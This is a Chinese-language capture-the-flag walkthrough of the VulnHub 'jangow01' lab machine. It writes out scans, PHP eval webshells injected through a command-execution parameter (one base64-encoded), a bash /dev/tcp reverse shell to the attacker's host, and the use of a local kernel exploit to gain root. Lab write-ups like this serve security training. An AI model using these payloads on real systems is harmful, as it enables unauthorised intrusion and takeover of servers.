NO.1 jangow01 靶场

admin 2024年11月27日23:05:53评论11 views字数 1331阅读4分26秒阅读模式

NO.1 jangow01 靶场

01.靶场介绍

Difficulty: easy

The secret to this box is enumeration! Inquiries [email protected]

This works better with VirtualBox rather than VMware ## Changelog 2021-11-04 - v1.0.1 2021-11-01 - v1.0.0

靶场链接:https://www.vulnhub.com/entry/jangow-101,754/

02.信息收集

1、主机发现
netdiscover -i eth1 -r 192.168.43/24

NO.1 jangow01 靶场

2、端口信息

nmap -sV -Pn -A 192.168.43.132 --script=vulnnmap -sV -Pn -p 1-65535 192.168.43.132

NO.1 jangow01 靶场

3、目录信息

目录信息发现了备份文件泄露,里面存在mysql账号密码,但是不能连接,先收集起来。

dirsearch -u http://192.168.43.132/ -e .php

NO.1 jangow01 靶场

NO.1 jangow01 靶场

03.漏洞挖掘

1、命令执行漏洞

这里访问web 页面发现存在一个可疑参数,可能存在文件包含或者命令执行,直接放 bp 去 fuzz 一下,结果如下:

NO.1 jangow01 靶场

2、源码泄露

这里用mysql的账号密码试了一下ftp,居然进去了。。。

NO.1 jangow01 靶场

进去后,发现存在网站配置账号密码,和存在漏洞的文件。最简单的 easy 等级了吧~

NO.1 jangow01 靶场


04.获取权限

这里利用命令执行漏洞直接写入webshell

http://192.168.43.132/site/busque.php?buscar=echo "<?php file_put_contents('c.php','<?php eval($_REQUEST[5]);?>'); ?>" > d.phphttp://192.168.43.132/site/busque.php?buscar=echo  "<?php @eval($_POST[pass]); ?>"  >> d.php

NO.1 jangow01 靶场

NO.1 jangow01 靶场

写进去了,但是post,get,request都被过滤了。用base64写入成功,

然后用蚁剑成功连接小马儿

NO.1 jangow01 靶场

echo "PD9waHAgQGV2YWwoJF9QT1NUW3Bhc3NdKTs/Pg=="|base64 -d > 11.php

NO.1 jangow01 靶场

NO.1 jangow01 靶场


05.权限提升

由于蚁剑里面提权不好操作,这里反弹一个shell 到 kali。这里有个坑!目标机器iptables 只允许https出入站。

bash -c 'exec bash -i &>/dev/tcp/192.168.43.19/443 <&1'

NO.1 jangow01 靶场查看一下版本信息:

NO.1 jangow01 靶场

在kali 里面找了有对应的exp,然后把45010.c 上传到目标主机目录上:

NO.1 jangow01 靶场

编译后,生成tiquan 脚本,执行提升为root 权限:

NO.1 jangow01 靶场

提权成功后,我们使用python 获取一个交互shell,加配置tab 补全功能。

python3 -c "import pty;pty.spawn('/bin/bash')"export TERM=xtermCtrl+zstty -astty raw -echo;fg               reset

查看iptables 规则:

NO.1 jangow01 靶场


06.查看FLAG

NO.1 jangow01 靶场

End

NO.1 jangow01 靶场

原文始发于微信公众号(贝雷帽SEC):NO.1 jangow01 靶场

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月27日23:05:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   NO.1 jangow01 靶场http://cn-sec.com/archives/1823062.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息